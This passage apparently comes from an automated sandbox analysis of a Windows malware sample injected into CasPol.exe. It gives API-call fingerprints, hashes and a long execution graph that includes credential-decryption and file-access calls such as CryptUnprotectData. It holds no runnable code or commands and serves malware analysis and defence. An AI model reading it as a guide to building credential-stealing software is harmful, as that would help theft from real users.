                                                                                                                                                                          • Instruction ID: 4cc810616d40180dbd1e9271652f71629269b6e9fac0605c61d014a2f2010889
                                                                                                                                                                          • Opcode Fuzzy Hash: d98377acd33bdda2349b7be151d0e491c89c80a6de05baeaae50e9a3ec635156
                                                                                                                                                                          • Instruction Fuzzy Hash: B0D0C934189712EBD7220B70AE49B443A6CA705322F141360F429413F1C6A98894AA18
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401BD9), ref: 00440D77
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00440D85
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                          • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                                                          • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                                                                                                          • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
APIs
• IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
• IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
• SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
• SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLastRead
• String ID:
• API String ID: 4100373531-0
• Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
• Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
• Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
• Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

Execution Graph

Execution Coverage: 5.8%
Dynamic/Decrypted Code Coverage: 9.2%
Signature Coverage: 0%
Total number of Nodes: 2000
Total number of Limit Nodes: 69
39060 40e08d OpenProcess 39059->39060 39061 40e0a4 GetCurrentProcess DuplicateHandle 39060->39061 39065 40e152 39060->39065 39062 40e0d0 GetFileSize 39061->39062 39063 40e14a CloseHandle 39061->39063 39066 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39062->39066 39063->39065 39064 40e160 39068 40b04b ??3@YAXPAX 39064->39068 39065->39064 39067 406214 22 API calls 39065->39067 39069 40e0ea 39066->39069 39067->39064 39068->39056 39070 4096dc CreateFileW 39069->39070 39071 40e0f1 CreateFileMappingW 39070->39071 39072 40e140 CloseHandle CloseHandle 39071->39072 39073 40e10b MapViewOfFile 39071->39073 39072->39063 39074 40e13b CloseHandle 39073->39074 39075 40e11f WriteFile UnmapViewOfFile 39073->39075 39074->39072 39075->39074 39077 40e18c 39076->39077 39078 406b90 11 API calls 39077->39078 39079 40e19f 39078->39079 39080 40e1a7 memset 39079->39080 39081 40e299 39079->39081 39086 40e1e8 39080->39086 39082 4069a3 ??3@YAXPAX free 39081->39082 39083 40e2a4 39082->39083 39083->39049 39084 406e8f 13 API calls 39084->39086 39085 406b53 SetFilePointerEx ReadFile 39085->39086 39086->39084 39086->39085 39087 40e283 39086->39087 39088 40dd50 _wcsicmp 39086->39088 39092 40742e 8 API calls 39086->39092 39093 40aae3 wcslen wcslen _memicmp 39086->39093 39094 40e244 _snwprintf 39086->39094 39089 40e291 39087->39089 39090 40e288 free 39087->39090 39088->39086 39091 40aa04 free 39089->39091 39090->39089 39091->39081 39092->39086 39093->39086 39095 40a8d0 7 API calls 39094->39095 39095->39086 39096->39049 39097->39034 39100 40a980 39098->39100 39099 40a8bb 39099->38973 39103 40a8d0 7 API calls 39099->39103 39100->39099 39101 40a995 _wcsicmp 39100->39101 39102 40a99c wcscmp 39100->39102 39101->39100 39102->39100 39103->38973 39104->38977 39105->38981 39107 40aa23 RegEnumValueW 39106->39107 39107->38988 39107->38989 39108->38992 39109->38994 39111 405335 39110->39111 39112 40522a 39110->39112 39111->38568 39113 40b2cc 27 API calls 39112->39113 39114 405234 39113->39114 39115 
40a804 8 API calls 39114->39115 39116 40523a 39115->39116 39155 40b273 39116->39155 39118 405248 _mbscpy _mbscat GetProcAddress 39119 40b273 27 API calls 39118->39119 39120 405279 39119->39120 39158 405211 GetProcAddress 39120->39158 39122 405282 39123 40b273 27 API calls 39122->39123 39124 40528f 39123->39124 39159 405211 GetProcAddress 39124->39159 39126 405298 39127 40b273 27 API calls 39126->39127 39128 4052a5 39127->39128 39160 405211 GetProcAddress 39128->39160 39130 4052ae 39131 40b273 27 API calls 39130->39131 39132 4052bb 39131->39132 39161 405211 GetProcAddress 39132->39161 39134 4052c4 39135 40b273 27 API calls 39134->39135 39136 4052d1 39135->39136 39162 405211 GetProcAddress 39136->39162 39138 4052da 39139 40b273 27 API calls 39138->39139 39140 4052e7 39139->39140 39163 405211 GetProcAddress 39140->39163 39156 40b58d 27 API calls 39155->39156 39157 40b18c 39156->39157 39157->39118 39158->39122 39159->39126 39160->39130 39161->39134 39162->39138 39168 40440c FreeLibrary 39167->39168 39169 40436d 39168->39169 39170 40a804 8 API calls 39169->39170 39171 404377 39170->39171 39172 404383 39171->39172 39173 404405 39171->39173 39174 40b273 27 API calls 39172->39174 39173->38576 39173->38580 39175 40438d GetProcAddress 39174->39175 39176 40b273 27 API calls 39175->39176 39177 4043a7 GetProcAddress 39176->39177 39178 40b273 27 API calls 39177->39178 39179 4043ba GetProcAddress 39178->39179 39180 40b273 27 API calls 39179->39180 39181 4043ce GetProcAddress 39180->39181 39182 40b273 27 API calls 39181->39182 39183 4043e2 GetProcAddress 39182->39183 39184 4043f1 39183->39184 39185 4043f7 39184->39185 39186 40440c FreeLibrary 39184->39186 39185->39173 39186->39173 39188 404413 FreeLibrary 39187->39188 39189 40441e 39187->39189 39188->39189 39189->38592 39190->38583 39192 40447e 39191->39192 39193 40442e 39191->39193 39194 404485 CryptUnprotectData 39192->39194 39195 40449c 39192->39195 39196 40b2cc 27 API calls 39193->39196 39194->39195 39195->38583 39197 404438 
39196->39197 39198 40a804 8 API calls 39197->39198 39199 40443e 39198->39199 39200 404445 39199->39200 39201 404467 39199->39201 39202 40b273 27 API calls 39200->39202 39201->39192 39203 404475 FreeLibrary 39201->39203 39204 40444f GetProcAddress 39202->39204 39203->39192 39204->39201 39205 404460 39204->39205 39205->39201 39207 4135f6 39206->39207 39208 4135eb FreeLibrary 39206->39208 39207->38595 39208->39207 39210 4449c4 39209->39210 39211 444a52 39209->39211 39212 40b2cc 27 API calls 39210->39212 39211->38615 39211->38616 39213 4449cb 39212->39213 39214 40a804 8 API calls 39213->39214 39236 403a29 39235->39236 39250 403bed memset memset 39236->39250 39238 403ae7 39263 40b1ab free free 39238->39263 39239 403a3f memset 39245 403a2f 39239->39245 39241 403aef 39241->38633 39242 409b98 GetFileAttributesW 39242->39245 39243 40a8d0 7 API calls 39243->39245 39244 409d1f 6 API calls 39244->39245 39245->39238 39245->39239 39245->39242 39245->39243 39245->39244 39247 40a051 GetFileTime CloseHandle 39246->39247 39248 4039ca CompareFileTime 39246->39248 39247->39248 39248->38633 39249->38634 39251 414c2e 17 API calls 39250->39251 39252 403c38 39251->39252 39253 409719 2 API calls 39252->39253 39254 403c3f wcscat 39253->39254 39255 414c2e 17 API calls 39254->39255 39256 403c61 39255->39256 39257 409719 2 API calls 39256->39257 39258 403c68 wcscat 39257->39258 39264 403af5 39258->39264 39261 403af5 20 API calls 39262 403c95 39261->39262 39262->39245 39263->39241 39265 403b02 39264->39265 39266 40ae18 9 API calls 39265->39266 39274 403b37 39266->39274 39267 403bdb 39269 40aebe FindClose 39267->39269 39268 40add4 wcscmp wcscmp 39268->39274 39270 403be6 39269->39270 39270->39261 39271 40ae18 9 API calls 39271->39274 39272 40ae51 9 API calls 39272->39274 39273 40aebe FindClose 39273->39274 39274->39267 39274->39268 39274->39271 39274->39272 39274->39273 39275 40a8d0 7 API calls 39274->39275 39275->39274 39277 409d1f 6 API calls 39276->39277 39278 404190 39277->39278 39291 409b98 
GetFileAttributesW 39278->39291 39280 40419c 39281 4041a7 6 API calls 39280->39281 39282 40435c 39280->39282 39283 40424f 39281->39283 39282->38660 39283->39282 39285 40425e memset 39283->39285 39287 409d1f 6 API calls 39283->39287 39288 40a8ab 9 API calls 39283->39288 39292 414842 39283->39292 39285->39283 39286 404296 wcscpy 39285->39286 39286->39283 39287->39283 39289 4042b6 memset memset _snwprintf wcscpy 39288->39289 39289->39283 39290->38658 39291->39280 39295 41443e 39292->39295 39294 414866 39294->39283 39296 41444b 39295->39296 39297 414451 39296->39297 39298 4144a3 GetPrivateProfileStringW 39296->39298 39299 414491 39297->39299 39300 414455 wcschr 39297->39300 39298->39294 39302 414495 WritePrivateProfileStringW 39299->39302 39300->39299 39301 414463 _snwprintf 39300->39301 39301->39302 39302->39294 39303->38664 39305 40b2cc 27 API calls 39304->39305 39306 409615 39305->39306 39307 409d1f 6 API calls 39306->39307 39308 409625 39307->39308 39331 409b98 GetFileAttributesW 39308->39331 39310 409634 39311 409648 39310->39311 39348 4091b8 241 API calls 39310->39348 39313 40b2cc 27 API calls 39311->39313 39315 408801 39311->39315 39314 40965d 39313->39314 39316 409d1f 6 API calls 39314->39316 39315->38667 39315->38668 39317 40966d 39316->39317 39332 409b98 GetFileAttributesW 39317->39332 39319 40967c 39319->39315 39333 409529 39319->39333 39331->39310 39332->39319 39349 4096c3 CreateFileW 39333->39349 39335 409543 39336 409550 GetFileSize 39335->39336 39347 4095cd 39335->39347 39347->39315 39348->39311 39349->39335 39380 413f4f 39353->39380 39356 413f37 K32GetModuleFileNameExW 39357 413f4a 39356->39357 39357->38722 39359 413969 wcscpy 39358->39359 39360 41396c wcschr 39358->39360 39371 413a3a 39359->39371 39360->39359 39362 41398e 39360->39362 39385 4097f7 wcslen wcslen _memicmp 39362->39385 39364 41399a 39365 4139a4 memset 39364->39365 39366 4139e6 39364->39366 39386 409dd5 GetWindowsDirectoryW wcscpy 39365->39386 39367 413a31 wcscpy 39366->39367 39368 4139ec 
memset 39366->39368 39367->39371 39387 409dd5 GetWindowsDirectoryW wcscpy 39368->39387 39371->38722 39372 4139c9 wcscpy wcscat 39372->39371 39373 413a11 memcpy wcscat 39373->39371 39375 413cb0 GetModuleHandleW 39374->39375 39376 413cda 39374->39376 39375->39376 39377 413cbf GetProcAddress 39375->39377 39378 413ce3 GetProcessTimes 39376->39378 39379 413cf6 39376->39379 39377->39376 39378->38730 39379->38730 39381 413f2f 39380->39381 39382 413f54 39380->39382 39381->39356 39381->39357 39383 40a804 8 API calls 39382->39383 39384 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39383->39384 39384->39381 39385->39364 39386->39372 39387->39373 39388->38751 39389->38774 39391 409cf9 GetVersionExW 39390->39391 39392 409d0a 39390->39392 39391->39392 39392->38780 39392->38785 39393->38787 39394->38790 39395->38792 39396->38837 39398 40bba5 39397->39398 39532 40cc26 39398->39532 39401 40bd4b 39553 40cc0c 39401->39553 39406 40b2cc 27 API calls 39407 40bbef 39406->39407 39560 40ccf0 _wcsicmp 39407->39560 39409 40bbf5 39409->39401 39561 40ccb4 6 API calls 39409->39561 39411 40bc26 39412 40cf04 17 API calls 39411->39412 39413 40bc2e 39412->39413 39414 40bd43 39413->39414 39415 40b2cc 27 API calls 39413->39415 39416 40cc0c 4 API calls 39414->39416 39417 40bc40 39415->39417 39416->39401 39562 40ccf0 _wcsicmp 39417->39562 39419 40bc46 39419->39414 39420 40bc61 memset memset WideCharToMultiByte 39419->39420 39563 40103c strlen 39420->39563 39422 40bcc0 39423 40b273 27 API calls 39422->39423 39424 40bcd0 memcmp 39423->39424 39424->39414 39425 40bce2 39424->39425 39426 404423 38 API calls 39425->39426 39427 40bd10 39426->39427 39427->39414 39428 40bd3a LocalFree 39427->39428 39429 40bd1f memcpy 39427->39429 39428->39414 39429->39428 39430->38852 39432 4438b5 11 API calls 39431->39432 39433 44444c 39432->39433 39439 40b879 39433->39439 39620 415a6d 39433->39620 39436 444486 39438 4444b9 memcpy 39436->39438 39476 4444a4 39436->39476 39437 44469e 
39437->39439 39441 443d90 111 API calls 39437->39441 39624 415258 39438->39624 39439->38855 39439->38856 39441->39439 39442 444524 39443 444541 39442->39443 39444 44452a 39442->39444 39627 444316 39443->39627 39661 416935 39444->39661 39448 444316 18 API calls 39449 444563 39448->39449 39450 444316 18 API calls 39449->39450 39451 44456f 39450->39451 39452 444316 18 API calls 39451->39452 39453 44457f 39452->39453 39453->39476 39641 432d4e 39453->39641 39456 444316 18 API calls 39457 4445b0 39456->39457 39645 41eed2 39457->39645 39459 4445cf 39460 4445d6 39459->39460 39461 4445ee 39459->39461 39463 416935 16 API calls 39460->39463 39669 43302c memset 39461->39669 39463->39476 39464 4445fa 39670 43302c memset 39464->39670 39674 4442e6 11 API calls 39476->39674 39719 438460 39477->39719 39479 40b8a4 39479->38864 39503 4251c4 39479->39503 39481 443da3 39480->39481 39482 443db6 39480->39482 39813 41707a 11 API calls 39481->39813 39482->38855 39484 443da8 39485 443dbc 39484->39485 39486 443dac 39484->39486 39815 4300e8 memset memset memcpy 39485->39815 39814 4446ea 11 API calls 39486->39814 39489 443dce 39490 443de0 39489->39490 39495 443e22 39489->39495 39491 416935 16 API calls 39490->39491 39491->39482 39492 443e5a 39817 4300e8 memset memset memcpy 39492->39817 39495->39492 39816 41f0ac 103 API calls 39495->39816 39496 443e63 39497 416935 16 API calls 39496->39497 39498 443f3b 39497->39498 39498->39482 39818 42320f memset memcpy 39498->39818 39501 409a74 GetTempFileNameW 39500->39501 39502 409a66 GetWindowsDirectoryW 39500->39502 39501->38850 39502->39501 39819 424f07 39503->39819 39505 4251e4 39506 4251f7 39505->39506 39507 4251e8 39505->39507 39827 4250f8 39506->39827 39826 4446ea 11 API calls 39507->39826 39509 4251f2 39509->38889 39511 425209 39514 425249 39511->39514 39517 4250f8 127 API calls 39511->39517 39518 425287 39511->39518 39835 4384e9 135 API calls 39511->39835 39836 424f74 124 API calls 39511->39836 39514->39518 39837 424ff0 13 API calls 39514->39837 
39517->39511 39839 415c7d 16 API calls 39518->39839 39519 425266 39519->39518 39838 415be9 memcpy 39519->39838 39521->38889 39522->38889 39523->38889 39524->38889 39525->38889 39526->38889 39527->38889 39528->38889 39529->38889 39530->38864 39531->38886 39564 4096c3 CreateFileW 39532->39564 39534 40cc34 39535 40cc3d GetFileSize 39534->39535 39543 40bbca 39534->39543 39536 40afcf 2 API calls 39535->39536 39537 40cc64 39536->39537 39565 40a2ef ReadFile 39537->39565 39539 40cc71 39566 40ab4a MultiByteToWideChar 39539->39566 39541 40cc95 CloseHandle 39542 40b04b ??3@YAXPAX 39541->39542 39542->39543 39543->39401 39544 40cf04 39543->39544 39545 40b633 free 39544->39545 39546 40cf14 39545->39546 39572 40b1ab free free 39546->39572 39548 40bbdd 39548->39401 39548->39406 39549 40cf1b 39549->39548 39551 40cfef 39549->39551 39573 40cd4b 39549->39573 39552 40cd4b 14 API calls 39551->39552 39552->39548 39554 40b633 free 39553->39554 39555 40cc15 39554->39555 39556 40aa04 free 39555->39556 39557 40cc1d 39556->39557 39619 40b1ab free free 39557->39619 39559 40b7d4 memset CreateFileW 39559->38844 39559->38845 39560->39409 39561->39411 39562->39419 39563->39422 39564->39534 39565->39539 39567 40ab93 39566->39567 39568 40ab6b 39566->39568 39567->39541 39569 40a9ce 4 API calls 39568->39569 39570 40ab74 39569->39570 39571 40ab7c MultiByteToWideChar 39570->39571 39571->39567 39572->39549 39574 40cd7b 39573->39574 39607 40aa29 6 API calls 39574->39607 39576 40cef5 39577 40aa04 free 39576->39577 39578 40cefd 39577->39578 39578->39549 39579 40cd89 39579->39576 39608 40aa29 6 API calls 39579->39608 39581 40ce1d 39609 40aa29 6 API calls 39581->39609 39583 40ce3e 39584 40ce6a 39583->39584 39610 40abb7 wcslen memmove 39583->39610 39585 40ce9f 39584->39585 39613 40abb7 wcslen memmove 39584->39613 39616 40a8d0 7 API calls 39585->39616 39588 40ce56 39611 40aa71 wcslen 39588->39611 39590 40ceb5 39617 40a8d0 7 API calls 39590->39617 39592 40ce8b 39614 40aa71 wcslen 39592->39614 39593 40ce5e 39612 
40abb7 wcslen memmove 39593->39612 39597 40ce93 39615 40abb7 wcslen memmove 39597->39615 39598 40cecb 39618 40d00b malloc memcpy free free 39598->39618 39601 40cedd 39602 40aa04 free 39601->39602 39603 40cee5 39602->39603 39604 40aa04 free 39603->39604 39605 40ceed 39604->39605 39606 40aa04 free 39605->39606 39606->39576 39607->39579 39608->39581 39609->39583 39610->39588 39611->39593 39612->39584 39613->39592 39614->39597 39615->39585 39616->39590 39617->39598 39618->39601 39619->39559 39621 415a77 39620->39621 39622 415a8d 39621->39622 39623 415a7e memset 39621->39623 39622->39436 39623->39622 39625 4438b5 11 API calls 39624->39625 39626 41525d 39625->39626 39626->39442 39628 444328 39627->39628 39629 444423 39628->39629 39630 44434e 39628->39630 39675 4446ea 11 API calls 39629->39675 39632 432d4e 3 API calls 39630->39632 39633 44435a 39632->39633 39635 444375 39633->39635 39640 44438b 39633->39640 39634 432d4e 3 API calls 39636 4443ec 39634->39636 39637 416935 16 API calls 39635->39637 39638 444381 39636->39638 39639 416935 16 API calls 39636->39639 39637->39638 39638->39448 39639->39638 39640->39634 39642 432d65 39641->39642 39643 432d58 39641->39643 39642->39456 39676 432cc4 memset memset memcpy 39643->39676 39646 41eee2 39645->39646 39647 415a6d memset 39646->39647 39648 41ef23 39647->39648 39649 415a6d memset 39648->39649 39653 41ef2d 39648->39653 39650 41ef42 39649->39650 39654 41ef49 39650->39654 39677 41b7d9 39650->39677 39653->39459 39654->39653 39692 41b321 101 API calls 39654->39692 39662 41693e 39661->39662 39668 41698e 39661->39668 39663 41694c 39662->39663 39698 422fd1 memset 39662->39698 39663->39668 39699 4165a0 39663->39699 39668->39476 39669->39464 39674->39437 39675->39638 39676->39642 39683 41b812 39677->39683 39678 415a6d memset 39686 41b884 39683->39686 39689 41b849 39683->39689 39693 444706 11 API calls 39683->39693 39686->39678 39686->39689 39692->39653 39693->39686 39698->39663 39705 415cfe 39699->39705 39704 422b84 15 API calls 
39704->39668 39710 415d23 __aullrem __aulldvrm 39705->39710 39712 41628e 39705->39712 39706 4163ca 39707 416422 10 API calls 39706->39707 39707->39712 39708 416422 10 API calls 39708->39710 39709 416172 memset 39709->39710 39710->39706 39710->39708 39710->39709 39711 415cb9 10 API calls 39710->39711 39710->39712 39711->39710 39713 416520 39712->39713 39714 416527 39713->39714 39718 416574 39713->39718 39715 416544 39714->39715 39716 415700 10 API calls 39714->39716 39714->39718 39717 416561 memcpy 39715->39717 39715->39718 39716->39715 39717->39718 39718->39668 39718->39704 39731 41703f 39719->39731 39721 43847a 39722 43848a 39721->39722 39723 43847e 39721->39723 39738 438270 39722->39738 39768 4446ea 11 API calls 39723->39768 39727 438488 39727->39479 39729 4384bb 39730 438270 134 API calls 39729->39730 39730->39727 39732 417044 39731->39732 39733 41705c 39731->39733 39737 417055 39732->39737 39770 416760 11 API calls 39732->39770 39734 417075 39733->39734 39771 41707a 11 API calls 39733->39771 39734->39721 39737->39721 39772 415a91 39738->39772 39740 43828d 39741 438297 39740->39741 39742 438341 39740->39742 39744 4382d6 39740->39744 39812 415c7d 16 API calls 39741->39812 39776 44358f 39742->39776 39747 4382fb 39744->39747 39748 4382db 39744->39748 39746 438458 39746->39727 39769 424f26 123 API calls 39746->39769 39808 415c23 memcpy 39747->39808 39750 416935 16 API calls 39748->39750 39752 4382e9 39750->39752 39751 438305 39755 44358f 19 API calls 39751->39755 39757 438318 39751->39757 39807 415c7d 16 API calls 39752->39807 39754 438373 39761 438383 39754->39761 39809 4300e8 memset memset memcpy 39754->39809 39755->39757 39757->39754 39802 43819e 39757->39802 39759 4383f5 39764 438404 39759->39764 39765 43841c 39759->39765 39760 4383cd 39760->39759 39811 42453e 123 API calls 39760->39811 39761->39760 39810 415c23 memcpy 39761->39810 39767 416935 16 API calls 39764->39767 39766 416935 16 API calls 39765->39766 39766->39741 39767->39741 39768->39727 39769->39729 
39770->39737 39771->39732 39773 415a9d 39772->39773 39774 415ab3 39773->39774 39775 415aa4 memset 39773->39775 39774->39740 39775->39774 39777 4435be 39776->39777 39778 443676 39777->39778 39783 442ff8 19 API calls 39777->39783 39785 4436ce 39777->39785 39786 44366c 39777->39786 39800 44360c 39777->39800 39779 443758 39778->39779 39781 442ff8 19 API calls 39778->39781 39784 443737 39778->39784 39780 441409 memset 39779->39780 39791 443775 39779->39791 39780->39779 39781->39784 39782 442ff8 19 API calls 39782->39779 39783->39777 39784->39782 39788 4165ff 11 API calls 39785->39788 39789 4169a7 11 API calls 39786->39789 39787 4437be 39790 416760 11 API calls 39787->39790 39792 4437de 39787->39792 39788->39778 39789->39778 39790->39792 39791->39787 39796 415c56 11 API calls 39791->39796 39793 42463b memset memcpy 39792->39793 39795 443801 39792->39795 39793->39795 39794 443826 39797 43bd08 memset 39794->39797 39795->39794 39798 43024d memset 39795->39798 39796->39787 39799 443837 39797->39799 39798->39794 39799->39800 39801 43024d memset 39799->39801 39800->39757 39801->39799 39803 438246 39802->39803 39805 4381ba 39802->39805 39803->39754 39804 41f432 110 API calls 39804->39805 39805->39803 39805->39804 39806 41f638 104 API calls 39805->39806 39806->39805 39807->39741 39808->39751 39809->39761 39810->39760 39811->39759 39812->39746 39813->39484 39814->39482 39815->39489 39816->39495 39817->39496 39818->39482 39820 424f1f 39819->39820 39821 424f0c 39819->39821 39841 424eea 11 API calls 39820->39841 39840 416760 11 API calls 39821->39840 39824 424f18 39824->39505 39825 424f24 39825->39505 39826->39509 39828 425108 39827->39828 39834 42510d 39827->39834 39874 424f74 124 API calls 39828->39874 39831 42516e 39875 415c7d 16 API calls 39831->39875 39832 425115 39832->39511 39834->39832 39842 42569b 39834->39842 39835->39511 39836->39511 39837->39519 39838->39518 39839->39509 39840->39824 39841->39825 39843 4256f1 39842->39843 39870 4259c2 39842->39870 39849 4259da 
39843->39849 39853 422aeb memset memcpy memcpy 39843->39853 39854 429a4d 39843->39854 39859 4260a1 39843->39859 39868 429ac1 39843->39868 39843->39870 39873 425a38 39843->39873 39876 4227f0 memset memcpy 39843->39876 39877 422b84 15 API calls 39843->39877 39878 422b5d memset memcpy memcpy 39843->39878 39879 422640 13 API calls 39843->39879 39881 4241fc 11 API calls 39843->39881 39882 42413a 90 API calls 39843->39882 39848 4260dd 39887 424251 120 API calls 39848->39887 39886 416760 11 API calls 39849->39886 39853->39843 39855 429a66 39854->39855 39856 429a9b 39854->39856 39888 415c56 11 API calls 39855->39888 39860 429a96 39856->39860 39890 416760 11 API calls 39856->39890 39885 415c56 11 API calls 39859->39885 39891 424251 120 API calls 39860->39891 39862 429a7a 39889 416760 11 API calls 39862->39889 39869 425ad6 39868->39869 39892 415c56 11 API calls 39868->39892 39869->39831 39870->39869 39880 415c56 11 API calls 39870->39880 39873->39870 39883 422640 13 API calls 39873->39883 39884 4226e0 12 API calls 39873->39884 39874->39834 39875->39832 39876->39843 39877->39843 39878->39843 39879->39843 39880->39849 39881->39843 39882->39843 39883->39873 39884->39873 39885->39849 39886->39848 39887->39869 39888->39862 39889->39860 39890->39860 39891->39868 39892->39849 39893->38924 39894->38932 39904 44def7 39905 44df07 39904->39905 39906 44df00 ??3@YAXPAX 39904->39906 39907 44df17 39905->39907 39908 44df10 ??3@YAXPAX 39905->39908 39906->39905 39909 44df27 39907->39909 39910 44df20 ??3@YAXPAX 39907->39910 39908->39907 39911 44df37 39909->39911 39912 44df30 ??3@YAXPAX 39909->39912 39910->39909 39912->39911 37668 44dea5 37669 44deb5 FreeLibrary 37668->37669 37670 44dec3 37668->37670 37669->37670 39913 4148b6 FindResourceW 39914 4148cf SizeofResource 39913->39914 39917 4148f9 39913->39917 39915 4148e0 LoadResource 39914->39915 39914->39917 39916 4148ee LockResource 39915->39916 39915->39917 39916->39917 37847 415304 free 39918 441b3f 39928 43a9f6 39918->39928 39920 441b61 40101 
4386af memset 39920->40101 39922 44189a 39923 4418e2 39922->39923 39927 442bd4 39922->39927 39924 4418ea 39923->39924 40102 4414a9 12 API calls 39923->40102 39927->39924 40103 441409 memset 39927->40103 39929 43aa20 39928->39929 39930 43aadf 39928->39930 39929->39930 39931 43aa34 memset 39929->39931 39930->39920 39932 43aa56 39931->39932 39933 43aa4d 39931->39933 40104 43a6e7 39932->40104 40112 42c02e memset 39933->40112 39938 43aad3 40114 4169a7 11 API calls 39938->40114 39939 43aaae 39939->39930 39939->39938 39954 43aae5 39939->39954 39940 43ac18 39943 43ac47 39940->39943 40116 42bbd5 memcpy memcpy memcpy memset memcpy 39940->40116 39944 43aca8 39943->39944 40117 438eed 16 API calls 39943->40117 39947 43acd5 39944->39947 40119 4233ae 11 API calls 39944->40119 40120 423426 11 API calls 39947->40120 39948 43ac87 40118 4233c5 16 API calls 39948->40118 39952 43ace1 40121 439811 163 API calls 39952->40121 39953 43a9f6 161 API calls 39953->39954 39954->39930 39954->39940 39954->39953 40115 439bbb 22 API calls 39954->40115 39956 43acfd 39962 43ad2c 39956->39962 40122 438eed 16 API calls 39956->40122 39958 43ad19 40123 4233c5 16 API calls 39958->40123 39959 43ad58 40124 44081d 163 API calls 39959->40124 39962->39959 39965 43add9 39962->39965 39964 43ae3a memset 39966 43ae73 39964->39966 39965->39965 40128 423426 11 API calls 39965->40128 40129 42e1c0 147 API calls 39966->40129 39967 43adab 40126 438c4e 163 API calls 39967->40126 39970 43ad6c 39970->39930 39970->39967 40125 42370b memset memcpy memset 39970->40125 39971 43adcc 40127 440f84 12 API calls 39971->40127 39972 43ae96 40130 42e1c0 147 API calls 39972->40130 39976 43aea8 39977 43aec1 39976->39977 40131 42e199 147 API calls 39976->40131 39979 43af00 39977->39979 40132 42e1c0 147 API calls 39977->40132 39979->39930 39982 43af1a 39979->39982 39983 43b3d9 39979->39983 40133 438eed 16 API calls 39982->40133 39988 43b3f6 39983->39988 39992 43b4c8 39983->39992 39985 43b60f 39985->39930 40192 4393a5 17 API calls 
39985->40192 39986 43af2f 40134 4233c5 16 API calls 39986->40134 40174 432878 12 API calls 39988->40174 39990 43af51 40135 423426 11 API calls 39990->40135 39998 43b4f2 39992->39998 40180 42bbd5 memcpy memcpy memcpy memset memcpy 39992->40180 39994 43af7d 40136 423426 11 API calls 39994->40136 40181 43a76c 21 API calls 39998->40181 39999 43b529 40182 44081d 163 API calls 39999->40182 40000 43b462 40176 423330 11 API calls 40000->40176 40001 43af94 40137 423330 11 API calls 40001->40137 40005 43b47e 40009 43b497 40005->40009 40177 42374a memcpy memset memcpy memcpy memcpy 40005->40177 40006 43b544 40010 43b55c 40006->40010 40183 42c02e memset 40006->40183 40007 43b428 40007->40000 40175 432b60 16 API calls 40007->40175 40008 43afca 40138 423330 11 API calls 40008->40138 40178 4233ae 11 API calls 40009->40178 40184 43a87a 163 API calls 40010->40184 40016 43afdb 40139 4233ae 11 API calls 40016->40139 40018 43b56c 40021 43b58a 40018->40021 40185 423330 11 API calls 40018->40185 40019 43b4b1 40179 423399 11 API calls 40019->40179 40020 43afee 40140 44081d 163 API calls 40020->40140 40186 440f84 12 API calls 40021->40186 40026 43b4c1 40188 42db80 163 API calls 40026->40188 40028 43b592 40187 43a82f 16 API calls 40028->40187 40031 43b5b4 40189 438c4e 163 API calls 40031->40189 40033 43b5cf 40190 42c02e memset 40033->40190 40035 43b1ef 40151 4233c5 16 API calls 40035->40151 40036 43b005 40036->39930 40039 43b01f 40036->40039 40141 42d836 163 API calls 40036->40141 40039->40035 40149 423330 11 API calls 40039->40149 40150 42d71d 163 API calls 40039->40150 40040 43b212 40152 423330 11 API calls 40040->40152 40041 43b087 40142 4233ae 11 API calls 40041->40142 40043 43add4 40043->39985 40191 438f86 16 API calls 40043->40191 40047 43b22a 40153 42ccb5 11 API calls 40047->40153 40049 43b10f 40145 423330 11 API calls 40049->40145 40050 43b23f 40154 4233ae 11 API calls 40050->40154 40052 43b257 40155 4233ae 11 API calls 40052->40155 40056 43b129 40146 4233ae 11 API calls 
